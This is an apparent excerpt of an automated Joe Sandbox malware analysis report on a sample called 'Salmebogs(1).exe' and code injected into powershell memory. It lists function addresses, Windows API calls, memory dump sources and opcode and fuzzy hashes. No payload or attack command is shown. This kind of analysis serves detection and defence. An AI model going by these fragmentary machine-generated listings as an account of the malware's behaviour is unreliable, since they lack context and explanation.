                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: 2db196e0f7310a3ea08cf6f228cdd10093951b38e6a4e1a7139cbd366e119caf
                                                                        • Instruction ID: 5570e87b323d3ab4a73141f23c5ad1f32913b259369346fef97a544c26a8305a
                                                                        • Opcode Fuzzy Hash: 2db196e0f7310a3ea08cf6f228cdd10093951b38e6a4e1a7139cbd366e119caf
                                                                        • Instruction Fuzzy Hash: C4019E31500608AFEB209F11DD80B9B3726EB85355F108036F615792D0C37A8C929E29
                                                                        Function 004037E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,004037B9,004035CF,?), ref: 004037FB
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00403802
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004037E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Free$GlobalLibrary
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 1100898210-3936084776
                                                                        • Opcode ID: 513cb66aec3b184b1656533b532479dca3ec5b33ad4594f499a54eb9bf6dfc70
                                                                        • Instruction ID: 2f8b8ce22cb5ec106cd91628dbf998760d49a3025a1d563264e19f72e628b131
                                                                        • Opcode Fuzzy Hash: 513cb66aec3b184b1656533b532479dca3ec5b33ad4594f499a54eb9bf6dfc70
                                                                        • Instruction Fuzzy Hash: 34E0C2338110309BC6219F54FE04B5ABB686F44F22F19803BF880BB2608BB81C428BD8
                                                                        Function 00405A2D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405A33
                                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405A43
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrlen
                                                                        • String ID: C:\Users\user\Desktop
                                                                        • API String ID: 2709904686-3125694417
                                                                        • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                        • Instruction ID: b6b9263f7e6f7f33dca29af715431404939bf432e253a022a3dbfc1ec44a830d
                                                                        • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                        • Instruction Fuzzy Hash: D5D05EB2400920DAC322A704DC40D9F67A8EF52304746842AE840A6161D7785D818AAD
                                                                        Function 00405B67 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B77
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B8F
                                                                        • CharNextA.USER32(00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA0
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                        • Instruction ID: 726002b591c2c836e0c8fef6507a3208c362efe389af0cd528cd0253ba47f693
                                                                        • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                        • Instruction Fuzzy Hash: A0F0C235101914EFD7029FA5DD00D9EBBB8EF06350B2140A9E840F7310D674FE019BA8

                                                                        Executed Functions

                                                                        Function 074EA468 Relevance: 2.6, Strings: 1, Instructions: 1317COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: _
                                                                        • API String ID: 0-701932520
                                                                        • Opcode ID: 1bf5deb4d2c54a2a2390df0276c33a943dd5e5d62c69ba4bb23680e58f53e163
                                                                        • Instruction ID: 0d9f15c6d6a1d2d3f9da99ed22fbdfd8d50da0f7ee8b1c1e5f0c79e82baa9955
                                                                        • Opcode Fuzzy Hash: 1bf5deb4d2c54a2a2390df0276c33a943dd5e5d62c69ba4bb23680e58f53e163
                                                                        • Instruction Fuzzy Hash: D9B2B0B0B00215CFDB15CB68C854BFABBB6AF85325F14C4AAD5099B351DB32DD82CB91
                                                                        Function 074E2070 Relevance: 1.8, Strings: 1, Instructions: 593COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =
                                                                        • API String ID: 0-2322244508
                                                                        • Opcode ID: bbbdada7531e9d0012671c3e36e83b025443a24fd452294813050031dcf629fa
                                                                        • Instruction ID: 0f83f95500b5b789db3ff466228feae32d03c16ab9bf637e59cc577b27d263e3
                                                                        • Opcode Fuzzy Hash: bbbdada7531e9d0012671c3e36e83b025443a24fd452294813050031dcf629fa
                                                                        • Instruction Fuzzy Hash: AE1259B1B04656CFD7158B7898107EBBBAEBFC5222F1480BBD505CB751DAB1C842C7A2
                                                                        Function 07351AC8 Relevance: 1.1, Instructions: 1068COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3455795886.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: abc96e0b35865142a14d673e173f2a02f9c30d02ac4a224bb11ed47662b9eb45
                                                                        • Instruction ID: 5a9cbca98c0514a094b1b3977b15f213f65b337e8d4a2fe735afd63338afa239
                                                                        • Opcode Fuzzy Hash: abc96e0b35865142a14d673e173f2a02f9c30d02ac4a224bb11ed47662b9eb45
                                                                        • Instruction Fuzzy Hash: 4682D4F1B00219DFEB18CF68C850B6BBBA2BFC5310F14856AED098B651DB31D951CBA1
                                                                        Function 074E61A0 Relevance: 1.0, Instructions: 990COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b5c04013bc53541129829452c213f2dad450f2036b4bf5e6cdf87d1584b5b862
                                                                        • Instruction ID: 167e2ee61d6f6a88b59acfb3f999b81bb3ae0f197453eaae45aea1a7c2f28176
                                                                        • Opcode Fuzzy Hash: b5c04013bc53541129829452c213f2dad450f2036b4bf5e6cdf87d1584b5b862
                                                                        • Instruction Fuzzy Hash: 2D82A4B0B00215DFDB14DB58C840BAABBB6AFC5315F15C0AAD5499F351DB72EC82CB92
                                                                        Function 074E6FC8 Relevance: .6, Instructions: 647COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e542f10753851f78455307a458f9c00cc7eea8ebb6d759004c653b4f673a8da
                                                                        • Instruction ID: 180c790b124e3c01b43a9d639e20287d2373158d78b95f1f9fc60616c93aa44d
                                                                        • Opcode Fuzzy Hash: 7e542f10753851f78455307a458f9c00cc7eea8ebb6d759004c653b4f673a8da
                                                                        • Instruction Fuzzy Hash: DA525FB0A00215DFD760DB58C840FAABBB2AF85715F15C09AD9499F351CB72ED82CF92
                                                                        Function 074EC101 Relevance: .6, Instructions: 620COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e29fe56131155ce762f7fc055b6ab69b8fc78783627b20d6d1ae40ae34b9b4b1
                                                                        • Instruction ID: c0ca5ec9fbded9b7837ec1c46fbd50e63915c505662e9bb0ae079ef1ee0b5da4
                                                                        • Opcode Fuzzy Hash: e29fe56131155ce762f7fc055b6ab69b8fc78783627b20d6d1ae40ae34b9b4b1
                                                                        • Instruction Fuzzy Hash: AD424FB4B00215DFDB14DB58C850FAABBA2EF89705F548099E9099F351CB72ED82CF91
                                                                        Function 074E7C90 Relevance: .6, Instructions: 591COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50e82586bd5ee20fc8843b38ad54024b39651d367c8310bbcd8a49c5c9ce86b4
                                                                        • Instruction ID: e01dc1f2e012bdbb4c41b9caaa66a7ec143bc2d731bffba8bd079f44a775c735
                                                                        • Opcode Fuzzy Hash: 50e82586bd5ee20fc8843b38ad54024b39651d367c8310bbcd8a49c5c9ce86b4
                                                                        • Instruction Fuzzy Hash: 6B328DB0B00255DFDB14CB98C444FAABBB6AF84715F15806AE905AF791CB72EC41CB92
                                                                        Function 074EB910 Relevance: .5, Instructions: 503COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 05f239638929980b8199cf7b022ca2bf982fc07100cf8e634d914dd3882675d6
                                                                        • Instruction ID: c06af06b52d9845f73114f0a411af2b64fd80cf22e8b9ada8f5c2dc2d318377c
                                                                        • Opcode Fuzzy Hash: 05f239638929980b8199cf7b022ca2bf982fc07100cf8e634d914dd3882675d6
                                                                        • Instruction Fuzzy Hash: D9223DB0B00215DFDB14DB58C850FAABBA2EFC5705F548099E9099F391CB72ED828F91
                                                                        Function 074E70DA Relevance: .5, Instructions: 488COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 57bfc0be02a67835e94c4eb974c2f8e6aa1aa258f011c5874f789d22f949f129
                                                                        • Instruction ID: 21eaa04b6428e87888e16ac19ad346cbac3d12543a7878f7365c884bdc0b0db0
                                                                        • Opcode Fuzzy Hash: 57bfc0be02a67835e94c4eb974c2f8e6aa1aa258f011c5874f789d22f949f129
                                                                        • Instruction Fuzzy Hash: 9F225FB4A00215DFDB10DB58C840FAABBB2AF85715F15C09AE9499F351CB72ED81CF92
                                                                        Function 074EC1EA Relevance: .5, Instructions: 466COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8344c35c30dc42572c3b3960af45ff782b0f9e5177684e852a29e925c237c464
                                                                        • Instruction ID: 9cb290c6fd18ca4da83fed8f9e202ed767bf31bc83bd9f246380271453c5fc52
                                                                        • Opcode Fuzzy Hash: 8344c35c30dc42572c3b3960af45ff782b0f9e5177684e852a29e925c237c464
                                                                        • Instruction Fuzzy Hash: BE123EB4B00215DFDB14DB58C850FAABBA2EF85705F558099E9099F381CB72ED82CF91
                                                                        Function 074E7C71 Relevance: .4, Instructions: 449COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7207596c01d8deeafe660f073005f8a6857f8621e2b2d55359c8d9fbd621d305
                                                                        • Instruction ID: b856e0131fccdd12620df49443e243254ccb9b77e1e8269b64861b0aa5d4651e
                                                                        • Opcode Fuzzy Hash: 7207596c01d8deeafe660f073005f8a6857f8621e2b2d55359c8d9fbd621d305
                                                                        • Instruction Fuzzy Hash: 2812AFB0B00251EFDB14CB98C484F9ABBB6EF84725F14805AE905AF791CB72EC41CB91
                                                                        Function 08DF1120 Relevance: .4, Instructions: 437COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 562a1188a853fc6a2f4ab2630bc9d525fd62538892b161a91a81a4c6e8269b4f
                                                                        • Instruction ID: 50cb5b4a577851a47762b5d2321dc01a17b20daa47ba5b586b6d12ee191c47f2
                                                                        • Opcode Fuzzy Hash: 562a1188a853fc6a2f4ab2630bc9d525fd62538892b161a91a81a4c6e8269b4f
                                                                        • Instruction Fuzzy Hash: CC020974A00209DFDF05CF98D884AADBBB2FF88350F258269E905AB356D771ED41DB90
                                                                        Function 08DF20C0 Relevance: .4, Instructions: 423COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ae2d9f565f7fe9ca453e188761602adab7e06abf9fa1606ca5e3a6f5deeed85b
                                                                        • Instruction ID: aa7802eea1ce02691b6758c9156adf0708ae19dda144053326801c0294366036
                                                                        • Opcode Fuzzy Hash: ae2d9f565f7fe9ca453e188761602adab7e06abf9fa1606ca5e3a6f5deeed85b
                                                                        • Instruction Fuzzy Hash: C1024174A00209DFDB05CF98D884AADBBF2FF88350F258269E915AB365C771ED41DB90
                                                                        Function 08DF2680 Relevance: .4, Instructions: 407COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd650f1decc6059e7ad8fce4aa47d1c3b86d57f44987a40cae51e7698234ba26
                                                                        • Instruction ID: 1159485c398b4d6e7fe3adabf82f1d1bb4c50149d6386a378d2a6268508a9800
                                                                        • Opcode Fuzzy Hash: dd650f1decc6059e7ad8fce4aa47d1c3b86d57f44987a40cae51e7698234ba26
                                                                        • Instruction Fuzzy Hash: B7022174A00209DFDB15CF98D894A9EBBB2FF88350F258269E905AB355C731ED42DF90
                                                                        Function 08DF16E8 Relevance: .4, Instructions: 398COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8359bc02b076b6a3fc6bcfec46f91b73a5120b53120c5a2d9ff41201feb2afaa
                                                                        • Instruction ID: c6498caa3db49fc4aac912ca25962704cfba30040466b151783dc4b3d6947e8a
                                                                        • Opcode Fuzzy Hash: 8359bc02b076b6a3fc6bcfec46f91b73a5120b53120c5a2d9ff41201feb2afaa
                                                                        • Instruction Fuzzy Hash: D6020E74A00259DFDF05CF98D984AADBBB2FF88350F258259E905AB352C731ED42DB90
                                                                        Function 074EAF40 Relevance: .4, Instructions: 398COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0be0296291c60e7cb80d21bb08f2b6ef2d1aede84e6ae7990051034220193a79
                                                                        • Instruction ID: 26594461c5a00c496eb66b238b07419718aeb7bd70373b2089aa8a0cfe33fe32
                                                                        • Opcode Fuzzy Hash: 0be0296291c60e7cb80d21bb08f2b6ef2d1aede84e6ae7990051034220193a79
                                                                        • Instruction Fuzzy Hash: 1A021CB4A00229DFDB24DB54C854FEABBB2EF85304F1085E9D509AB741DB72AD81CF91
                                                                        Function 074E465F Relevance: .3, Instructions: 342COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fed285a58be2e989f8fe336e02ac6634dad47a8a6fea6c93c21697c3343a1a3a
                                                                        • Instruction ID: fc84a697e2ca9120ce8d794da0d1f7575c9b71040c737707f7a81815826ae717
                                                                        • Opcode Fuzzy Hash: fed285a58be2e989f8fe336e02ac6634dad47a8a6fea6c93c21697c3343a1a3a
                                                                        • Instruction Fuzzy Hash: 81D1AEB0B01255DFDB14CB98C540FAABBA2AFC5715F148069F905AF751CB72EC42CB91
                                                                        Function 08DF0800 Relevance: .3, Instructions: 340COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef34f13c634c56656be37f82422e4e581cba23475044d83539446699a959a3e4
                                                                        • Instruction ID: f1e12856e3b136bc1d912ab7e7eb322703d47501c07ecc5ed5c65989a582681c
                                                                        • Opcode Fuzzy Hash: ef34f13c634c56656be37f82422e4e581cba23475044d83539446699a959a3e4
                                                                        • Instruction Fuzzy Hash: 22E10B74A00609DFDB15CF98D484AADBBF2FF88350F258269E945AB352C731ED81DB90
                                                                        Function 074EC63A Relevance: .3, Instructions: 333COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 419fab708cbc7c00c51fb5881b98a72d53acf2c5ac1842480d627e3fca2f40d3
                                                                        • Instruction ID: d2564e0c1c93526ac9f0c4f2f0cac1c0097ff89360002dff8d69c8e95421f597
                                                                        • Opcode Fuzzy Hash: 419fab708cbc7c00c51fb5881b98a72d53acf2c5ac1842480d627e3fca2f40d3
                                                                        • Instruction Fuzzy Hash: C1E15CB4E00229DFDB20DB64C894BEABB76BF85315F1081A9D509AB741CB72DD81CF91
                                                                        Function 074EF893 Relevance: .3, Instructions: 315COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3456155846.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_74e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7cecd245a77ce1f3fbdb454f6c3cfd7242e7e3dc687cc4ba2bfd65fbcca3df30
                                                                        • Instruction ID: 7692fbc494d074adc1824d630dc51d23c5eb0a37fe7e59cfdcbe6d8cb8a05ecd
                                                                        • Opcode Fuzzy Hash: 7cecd245a77ce1f3fbdb454f6c3cfd7242e7e3dc687cc4ba2bfd65fbcca3df30
                                                                        • Instruction Fuzzy Hash: CDA126B1B0421ADFDB558E78C4102FBBBAAAF86262F14846BD985CF341DB31C949C791
